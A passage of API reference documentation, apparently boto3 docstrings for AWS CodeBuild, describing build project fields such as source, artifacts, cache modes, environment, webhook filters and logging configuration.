* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to "``/`` ", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **cache** *(dict) --*
Information about the cache for the build project.
- **type** *(string) --*
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux enviornment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to one of the other three local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overriden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
- **environment** *(dict) --*
Information about the build environment for this build project.
- **type** *(string) --*
The type of build environment to use for related builds.
- **image** *(string) --*
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag "latest," use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest "sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf," use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --*
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --*
The name or key of the environment variable.
- **value** *(string) --*
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is be used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system's base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c "until docker info; do echo .; sleep 1; done"``
If the operating system's base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 -t sh -c "until docker info; do echo .; sleep 1; done"``
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --*
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --*
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild's service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project's service role.
When you use a cross-account or private registry image, you must use SERVICE_ROLE credentials. When you use an AWS CodeBuild curated image, you must use CODEBUILD credentials.
- **serviceRole** *(string) --*
The ARN of the AWS Identity and Access Management (IAM) role that enables AWS CodeBuild to interact with dependent AWS services on behalf of the AWS account.
- **timeoutInMinutes** *(integer) --*
How long, in minutes, from 5 to 480 (8 hours), for AWS CodeBuild to wait before timing out any related build that did not get marked as completed. The default is 60 minutes.
- **queuedTimeoutInMinutes** *(integer) --*
The number of minutes a build is allowed to be queued before it times out.
- **encryptionKey** *(string) --*
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK's alias (using the format ``alias/*alias-name* `` ).
- **tags** *(list) --*
The tags for this build project.
These tags are available for use by AWS services that support AWS CodeBuild build project tags.
- *(dict) --*
A tag, consisting of a key and a value.
This tag is available for use by AWS services that support tags in AWS CodeBuild.
- **key** *(string) --*
The tag's key.
- **value** *(string) --*
The tag's value.
- **created** *(datetime) --*
When the build project was created, expressed in Unix time format.
- **lastModified** *(datetime) --*
When the build project's settings were last modified, expressed in Unix time format.
- **webhook** *(dict) --*
Information about a webhook that connects repository events to a build project in AWS CodeBuild.
- **url** *(string) --*
The URL to the webhook.
- **payloadUrl** *(string) --*
The AWS CodeBuild endpoint where webhook events are sent.
- **secret** *(string) --*
The secret token of the associated repository.
.. note::
A Bitbucket webhook does not support ``secret`` .
- **branchFilter** *(string) --*
A regular expression used to determine which repository branches are built when a webhook is triggered. If the name of a branch matches the regular expression, then it is built. If ``branchFilter`` is empty, then all branches are built.
.. note::
It is recommended that you use ``filterGroups`` instead of ``branchFilter`` .
- **filterGroups** *(list) --*
An array of arrays of ``WebhookFilter`` objects used to determine which webhooks are triggered. At least one ``WebhookFilter`` in the array must specify ``EVENT`` as its ``type`` .
For a build to be triggered, at least one filter group in the ``filterGroups`` array must pass. For a filter group to pass, each of its filters must pass.
- *(list) --*
- *(dict) --*
A filter used to determine which webhooks trigger a build.
- **type** *(string) --*
The type of webhook filter. There are five webhook filter types: ``EVENT`` , ``ACTOR_ACCOUNT_ID`` , ``HEAD_REF`` , ``BASE_REF`` , and ``FILE_PATH`` .
EVENT
A webhook event triggers a build when the provided ``pattern`` matches one of four event types: ``PUSH`` , ``PULL_REQUEST_CREATED`` , ``PULL_REQUEST_UPDATED`` , and ``PULL_REQUEST_REOPENED`` . The ``EVENT`` patterns are specified as a comma-separated string. For example, ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` filters all push, pull request created, and pull request updated events.
.. note::
The ``PULL_REQUEST_REOPENED`` works with GitHub and GitHub Enterprise only.
ACTOR_ACCOUNT_ID
A webhook event triggers a build when a GitHub, GitHub Enterprise, or Bitbucket account ID matches the regular expression ``pattern`` .
HEAD_REF
A webhook event triggers a build when the head reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` and ``refs/tags/tag-name`` .
Works with GitHub and GitHub Enterprise push, GitHub and GitHub Enterprise pull request, Bitbucket push, and Bitbucket pull request events.
BASE_REF
A webhook event triggers a build when the base reference matches the regular expression ``pattern`` . For example, ``refs/heads/branch-name`` .
.. note::
Works with pull request events only.
FILE_PATH
A webhook triggers a build when the path of a changed file matches the regular expression ``pattern`` .
.. note::
Works with GitHub and GitHub Enterprise push events only.
- **pattern** *(string) --*
For a ``WebHookFilter`` that uses ``EVENT`` type, a comma-separated string that specifies one or more events. For example, the webhook filter ``PUSH, PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED`` allows all push, pull request created, and pull request updated events to trigger a build.
For a ``WebHookFilter`` that uses any of the other filter types, a regular expression pattern. For example, a ``WebHookFilter`` that uses ``HEAD_REF`` for its ``type`` and the pattern ``^refs/heads/`` triggers a build when the head reference is a branch with a reference name ``refs/heads/branch-name`` .
- **excludeMatchedPattern** *(boolean) --*
Used to indicate that the ``pattern`` determines which webhook events do not trigger a build. If true, then a webhook event that does not match the ``pattern`` triggers a build. If false, then a webhook event that matches the ``pattern`` triggers a build.
- **lastModifiedSecret** *(datetime) --*
A timestamp that indicates the last time a repository's secret token was modified.
- **vpcConfig** *(dict) --*
Information about the VPC configuration that AWS CodeBuild accesses.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security groups IDs in your Amazon VPC.
- *(string) --*
- **badge** *(dict) --*
Information about the build badge for the build project.
- **badgeEnabled** *(boolean) --*
Set this to true to generate a publicly accessible URL for your project's build badge.
- **badgeRequestUrl** *(string) --*
The publicly-accessible URL through which you can access the build badge for your project.
The publicly accessible URL through which you can access the build badge for your project.
- **logsConfig** *(dict) --*
Information about logs for the build project. A project can create logs in Amazon CloudWatch Logs, an S3 bucket, or both.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project. Amazon CloudWatch Logs are enabled by default.
- **status** *(string) --*
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about logs built to an S3 bucket for a build project. S3 logs are not enabled by default.
- **status** *(string) --*
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
:type name: string
:param name: **[REQUIRED]**
The name of the build project.
:type description: string
:param description:
A description that makes the build project easy to identify.
:type source: dict
:param source: **[REQUIRED]**
Information about the build input source code for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline\'s source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --* **[REQUIRED]**
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console\'s use only. Your code should not get or set this information directly.
- **type** *(string) --* **[REQUIRED]**
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build\'s start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
:type secondarySources: list
:param secondarySources:
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline\'s source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --* **[REQUIRED]**
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console\'s use only. Your code should not get or set this information directly.
- **type** *(string) --* **[REQUIRED]**
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build\'s start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
:type artifacts: dict
:param artifacts: **[REQUIRED]**
Information about the build output artifacts for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash (\"/\"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to \"``/`` \", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to \"``/`` \", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
:type secondaryArtifacts: list
:param secondaryArtifacts:
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash (\"/\"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to \"``/`` \", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to \"``/`` \", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
:type cache: dict
:param cache:
Stores recently used information so that it can be quickly accessed at a later time.
- **type** *(string) --* **[REQUIRED]**
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux enviornment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to one of the other three local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overriden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
:type environment: dict
:param environment: **[REQUIRED]**
Information about the build environment for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build environment to use for related builds.
- **image** *(string) --* **[REQUIRED]**
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag \"latest,\" use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest \"sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf,\" use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --* **[REQUIRED]**
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
